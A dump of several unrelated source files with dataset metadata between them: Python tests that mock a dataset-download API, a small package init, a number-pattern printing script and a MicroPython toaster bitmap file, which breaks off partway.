mocked_responses.get(f"https://dummyurl.com/{obj_id_1}?params=1",
body=data1.read(), status=200,
content_type='application/octet-stream')
mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_2}',
payload={
"presigned_url": f"https://dummyurl.com/{obj_id_2}?params=1",
"namespace": ds.namespace,
"obj_id": obj_id_2,
"dataset": ds.name
},
status=200)
with open(obj2_source, 'rb') as data2:
mocked_responses.get(f"https://dummyurl.com/{obj_id_2}?params=1",
body=data2.read(), status=200,
content_type='application/octet-stream')
dl_kwargs = {
'logged_in_username': "default",
'access_token': "asdf",
'id_token': "1234",
'dataset_owner': "default",
'dataset_name': "dataset100",
'labbook_owner': None,
'labbook_name': None,
'all_keys': False,
'keys': ["test1.txt"]
}
result = jobs.download_dataset_files(**dl_kwargs)
assert os.path.isfile(obj1_target) is True
assert os.path.isfile(obj2_target) is False
decompressor = snappy.StreamDecompressor()
with open(obj1_source, 'rb') as dd:
source1 = decompressor.decompress(dd.read())
source1 += decompressor.flush()
with open(obj1_target, 'rt') as dd:
dest1 = dd.read()
assert source1.decode("utf-8") == dest1
# Download other file
dl_kwargs = {
'logged_in_username': "default",
'access_token': "asdf",
'id_token': "1234",
'dataset_owner': "default",
'dataset_name': "dataset100",
'labbook_owner': None,
'labbook_name': None,
'all_keys': False,
'keys': ["test2.txt"]
}
jobs.download_dataset_files(**dl_kwargs)
assert os.path.isfile(obj1_target) is True
assert os.path.isfile(obj2_target) is True
with open(obj1_source, 'rb') as dd:
source1 = decompressor.decompress(dd.read())
source1 += decompressor.flush()
with open(obj1_target, 'rt') as dd:
dest1 = dd.read()
assert source1.decode("utf-8") == dest1
with open(obj2_source, 'rb') as dd:
source1 = decompressor.decompress(dd.read())
source1 += decompressor.flush()
with open(obj2_target, 'rt') as dd:
dest1 = dd.read()
assert source1.decode("utf-8") == dest1
def test_download_dataset_files_all(self, mock_config_file):
im = InventoryManager(mock_config_file[0])
ds = im.create_dataset('default', 'default', "dataset100", storage_type="gigantum_object_v1", description="100")
m = Manifest(ds, 'default')
iom = IOManager(ds, m)
os.makedirs(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, "other_dir"))
helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test1.txt", "asdfadfsdf")
helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test2.txt", "fdsfgfd")
m.sweep_all_changes()
obj_to_push = iom.objects_to_push()
assert len(obj_to_push) == 2
_, obj_id_1 = obj_to_push[0].object_path.rsplit('/', 1)
_, obj_id_2 = obj_to_push[1].object_path.rsplit('/', 1)
obj1_target = obj_to_push[0].object_path
obj2_target = obj_to_push[1].object_path
obj1_source = os.path.join('/tmp', uuid.uuid4().hex)
obj2_source = os.path.join('/tmp', uuid.uuid4().hex)
assert os.path.exists(obj1_target) is True
assert os.path.exists(obj2_target) is True
helper_compress_file(obj1_target, obj1_source)
helper_compress_file(obj2_target, obj2_source)
assert os.path.isfile(obj1_target) is False
assert os.path.isfile(obj2_target) is False
assert os.path.isfile(obj1_source) is True
assert os.path.isfile(obj2_source) is True
# Clear out from linked dir
os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt'))
os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt'))
with patch.object(Configuration, 'find_default_config', lambda self: mock_config_file[0]):
with aioresponses() as mocked_responses:
mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_1}',
payload={
"presigned_url": f"https://dummyurl.com/{obj_id_1}?params=1",
"namespace": ds.namespace,
"obj_id": obj_id_1,
"dataset": ds.name
},
status=200)
with open(obj1_source, 'rb') as data1:
mocked_responses.get(f"https://dummyurl.com/{obj_id_1}?params=1",
body=data1.read(), status=200,
content_type='application/octet-stream')
mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_2}',
payload={
"presigned_url": f"https://dummyurl.com/{obj_id_2}?params=1",
"namespace": ds.namespace,
"obj_id": obj_id_2,
"dataset": ds.name
},
status=200)
with open(obj2_source, 'rb') as data2:
mocked_responses.get(f"https://dummyurl.com/{obj_id_2}?params=1",
body=data2.read(), status=200,
content_type='application/octet-stream')
dl_kwargs = {
'logged_in_username': "default",
'access_token': "asdf",
'id_token': "1234",
'dataset_owner': "default",
'dataset_name': "dataset100",
'labbook_owner': None,
'labbook_name': None,
'all_keys': True,
'keys': None
}
result = jobs.download_dataset_files(**dl_kwargs)
assert os.path.isfile(obj1_target) is True
assert os.path.isfile(obj2_target) is True
assert os.path.isfile(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt')) is True
assert os.path.isfile(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt')) is True
decompressor = snappy.StreamDecompressor()
with open(obj1_source, 'rb') as dd:
source1 = decompressor.decompress(dd.read())
source1 += decompressor.flush()
with open(obj1_target, 'rt') as dd:
dest1 = dd.read()
assert source1.decode("utf-8") == dest1
with open(obj2_source, 'rb') as dd:
source1 = decompressor.decompress(dd.read())
source1 += decompressor.flush()
with open(obj2_target, 'rt') as dd:
dest1 = dd.read()
assert source1.decode("utf-8") == dest1
def test_download_dataset_files_error(self, mock_config_file):
im = InventoryManager(mock_config_file[0])
ds = im.create_dataset('default', 'default', "dataset100", storage_type="gigantum_object_v1", description="100")
m = Manifest(ds, 'default')
iom = IOManager(ds, m)
os.makedirs(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, "other_dir"))
helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test1.txt", "asdfadfsdf")
helper_append_file(m.cache_mgr.cache_root, m.dataset_revision, "test2.txt", "fdsfgfd")
m.sweep_all_changes()
obj_to_push = iom.objects_to_push()
assert len(obj_to_push) == 2
_, obj_id_1 = obj_to_push[0].object_path.rsplit('/', 1)
_, obj_id_2 = obj_to_push[1].object_path.rsplit('/', 1)
obj1_target = obj_to_push[0].object_path
obj2_target = obj_to_push[1].object_path
obj1_source = os.path.join('/tmp', uuid.uuid4().hex)
obj2_source = os.path.join('/tmp', uuid.uuid4().hex)
assert os.path.exists(obj1_target) is True
assert os.path.exists(obj2_target) is True
helper_compress_file(obj1_target, obj1_source)
helper_compress_file(obj2_target, obj2_source)
assert os.path.isfile(obj1_target) is False
assert os.path.isfile(obj2_target) is False
assert os.path.isfile(obj1_source) is True
assert os.path.isfile(obj2_source) is True
# Clear out from linked dir
os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt'))
os.remove(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt'))
with patch.object(Configuration, 'find_default_config', lambda self: mock_config_file[0]):
with aioresponses() as mocked_responses:
mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_1}',
payload={
"presigned_url": f"https://dummyurl.com/{obj_id_1}?params=1",
"namespace": ds.namespace,
"obj_id": obj_id_1,
"dataset": ds.name
},
status=200)
with open(obj1_source, 'rb') as data1:
mocked_responses.get(f"https://dummyurl.com/{obj_id_1}?params=1",
body=data1.read(), status=200,
content_type='application/octet-stream')
mocked_responses.get(f'https://api.gigantum.com/object-v1/{ds.namespace}/{ds.name}/{obj_id_2}',
payload={
"presigned_url": f"https://dummyurl.com/{obj_id_2}?params=1",
"namespace": ds.namespace,
"obj_id": obj_id_2,
"dataset": ds.name
},
status=400)
dl_kwargs = {
'logged_in_username': "default",
'access_token': "asdf",
'id_token': "1234",
'dataset_owner': "default",
'dataset_name': "dataset100",
'labbook_owner': None,
'labbook_name': None,
'all_keys': True,
'keys': None
}
with pytest.raises(SystemExit):
jobs.download_dataset_files(**dl_kwargs)
assert os.path.isfile(obj1_target) is True
assert os.path.isfile(obj2_target) is False
assert os.path.isfile(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test1.txt')) is True
assert os.path.isfile(os.path.join(m.cache_mgr.cache_root, m.dataset_revision, 'test2.txt')) is False
| 49.405063
| 120
| 0.525813
| 1,721
| 15,612
| 4.532249
| 0.08774
| 0.037692
| 0.046154
| 0.055385
| 0.932949
| 0.929487
| 0.929487
| 0.929487
| 0.929487
| 0.929487
| 0
| 0.028646
| 0.364976
| 15,612
| 315
| 121
| 49.561905
| 0.75812
| 0.006213
| 0
| 0.874046
| 0
| 0.022901
| 0.145455
| 0.007737
| 0
| 0
| 0
| 0
| 0.145038
| 1
| 0.01145
| false
| 0
| 0.049618
| 0
| 0.064886
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfd54e84078c56570d85041bef69b063c44e69eb
| 44
|
py
|
Python
|
shapes/__init__.py
|
vtlim/shapes
|
d8d7ad053be2200757cbfd4039aeb2f5f5dc0f2f
|
[
"MIT"
] | null | null | null |
shapes/__init__.py
|
vtlim/shapes
|
d8d7ad053be2200757cbfd4039aeb2f5f5dc0f2f
|
[
"MIT"
] | 1
|
2018-02-16T00:11:14.000Z
|
2018-02-16T00:11:14.000Z
|
shapes/__init__.py
|
vtlim/shapes
|
d8d7ad053be2200757cbfd4039aeb2f5f5dc0f2f
|
[
"MIT"
] | null | null | null |
from . import square
from . import triangle
| 14.666667
| 22
| 0.772727
| 6
| 44
| 5.666667
| 0.666667
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 44
| 2
| 23
| 22
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5c904a7cb408fc9e2a3bf542b61ce34257fcaa2b
| 293
|
py
|
Python
|
Chapter-3 Loop/Triangle_Pattern/Damru.py
|
jaiswalIT02/pythonprograms
|
bc94e52121202b04c3e9112d9786f93ed6707f7a
|
[
"MIT"
] | null | null | null |
Chapter-3 Loop/Triangle_Pattern/Damru.py
|
jaiswalIT02/pythonprograms
|
bc94e52121202b04c3e9112d9786f93ed6707f7a
|
[
"MIT"
] | null | null | null |
Chapter-3 Loop/Triangle_Pattern/Damru.py
|
jaiswalIT02/pythonprograms
|
bc94e52121202b04c3e9112d9786f93ed6707f7a
|
[
"MIT"
] | null | null | null |
n=5
for i in range(n,0,-1):
for j in range(1,n-i+1):
print(" ",end="")
for k in range(1,2*i):
print(i,end="")
print()
for i in range(2,n+1):
for j in range(1,n-i+1):
print(" ",end="")
for k in range(1,2*i):
print(i,end="")
print()
| 18.3125
| 28
| 0.450512
| 58
| 293
| 2.275862
| 0.224138
| 0.318182
| 0.242424
| 0.166667
| 0.787879
| 0.787879
| 0.787879
| 0.787879
| 0.787879
| 0.787879
| 0
| 0.065657
| 0.324232
| 293
| 15
| 29
| 19.533333
| 0.60101
| 0
| 0
| 0.769231
| 0
| 0
| 0.006826
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.461538
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
5ca247e846137392c755c84ef767ddbe0c7feaf3
| 44,391
|
py
|
Python
|
examples/esp32_320x240/toasters/toast_bitmaps.py
|
slabua/st7789py_mpy
|
31e6f94592563e2b5ad716c48486e605ca3911bb
|
[
"MIT"
] | null | null | null |
examples/esp32_320x240/toasters/toast_bitmaps.py
|
slabua/st7789py_mpy
|
31e6f94592563e2b5ad716c48486e605ca3911bb
|
[
"MIT"
] | null | null | null |
examples/esp32_320x240/toasters/toast_bitmaps.py
|
slabua/st7789py_mpy
|
31e6f94592563e2b5ad716c48486e605ca3911bb
|
[
"MIT"
] | null | null | null |
BITMAPS = 5
HEIGHT = 64
WIDTH = 64
COLORS = 16
BITS = 81920
BPP = 4
PALETTE = [0x0000,0x00f8,0x4082,0xe0ff,0x609b,0x4049,0xff07,0xffff,0xdbde,0xb6b5,0x9294,0x6d6b,0x494a,0x2421,0x00d8,0x00b0]
_bitmap =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x77\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x77\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x77\x77\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x77\x77\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x00\x77\x77\x77\x00\x00\x77\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x00\x77\x77\x77\x00\x00\x77\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x77\x77\x77\x77\x77\x00\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x77\x77\x77\x77\x77\x00\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x77\x77\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x77\x77\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\x77\x77\x77\x77\x77\x00\xbb\x22\x22\x00\x00\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\x77\x77\x77\x77\x77\x00\xbb\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x00\x00\x00\x00\xbb\xbb\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x00\x00\x00\x00\xbb\xbb\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x77\x77\x77\x00\xbb\xbb\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x77\x77\x77\x00\xbb\xbb\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\xbb\xbb\xbb\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\xbb\xbb\xbb\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
